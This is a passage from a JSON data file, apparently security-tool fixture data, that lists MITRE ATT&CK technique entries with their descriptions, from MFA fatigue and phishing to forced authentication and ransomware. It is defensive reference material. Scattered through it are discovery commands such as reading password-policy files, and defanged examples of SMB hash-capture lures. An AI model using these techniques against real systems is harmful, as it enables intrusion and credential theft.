Guidance)\nhttps://attack.mitre.org/techniques/T1606\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1621 - Multi-Factor Authentication Request Generation", - "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to \u201cMFA fatigue.\u201d(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)\nhttps://attack.mitre.org/techniques/T1621\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1554 - Compromise Client Software Binary", - "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.\nhttps://attack.mitre.org/techniques/T1554\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1212 - Exploitation for Credential Access", - "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.\nhttps://attack.mitre.org/techniques/T1212\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1590 - Gather Victim Network Information", - "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\nhttps://attack.mitre.org/techniques/T1590\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1210 - Exploitation of Remote Services", - "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.\nhttps://attack.mitre.org/techniques/T1210\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1534 - Internal Spearphishing", - "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)\nhttps://attack.mitre.org/techniques/T1534\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1199 - Trusted Relationship", - "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)\nhttps://attack.mitre.org/techniques/T1199\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1593 - Search Open Websites/Domains", - "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).\nhttps://attack.mitre.org/techniques/T1593\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1098 - Account Manipulation", - "description": "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).\nhttps://attack.mitre.org/techniques/T1098\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1048 - Exfiltration Over Alternative Protocol", - "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).\nhttps://attack.mitre.org/techniques/T1048\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1597 - Search Closed Sources", - "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1597\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1566 - Phishing", - "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)\nhttps://attack.mitre.org/techniques/T1566\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1110 - Brute Force", - "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.\nhttps://attack.mitre.org/techniques/T1110\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1565 - Data Manipulation", - "description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.\nhttps://attack.mitre.org/techniques/T1565\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1559 - Inter-Process Communication", - "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)\nhttps://attack.mitre.org/techniques/T1559\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1001 - Data Obfuscation", - "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.\nhttps://attack.mitre.org/techniques/T1001\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1039 - Data from Network Shared Drive", - "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.\nhttps://attack.mitre.org/techniques/T1039\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1601 - Modify System Image", - "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.\nhttps://attack.mitre.org/techniques/T1601\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1574 - Hijack Execution Flow", - "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.\nhttps://attack.mitre.org/techniques/T1574\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1078 - Valid Accounts", - "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)\nhttps://attack.mitre.org/techniques/T1078\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1571 - Non-Standard Port", - "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)\nhttps://attack.mitre.org/techniques/T1571\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1068 - Exploitation for Privilege Escalation", - "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).\nhttps://attack.mitre.org/techniques/T1068\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1531 - Account Access Removal", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.\nhttps://attack.mitre.org/techniques/T1531\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1027 - Obfuscated Files or Information", - "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)\nhttps://attack.mitre.org/techniques/T1027\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1201 - Password Policy Discovery", - "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).\nhttps://attack.mitre.org/techniques/T1201\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1546 - Event Triggered Execution", - "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.\nhttps://attack.mitre.org/techniques/T1546\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1187 - Forced Authentication", - "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)\nhttps://attack.mitre.org/techniques/T1187\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1599 - Network Boundary Bridging", - "description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.\nhttps://attack.mitre.org/techniques/T1599\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1486 - Data Encrypted for Impact", - "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").(Citation: NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)\nhttps://attack.mitre.org/techniques/T1486\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1553 - Subvert Trust Controls", - "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to 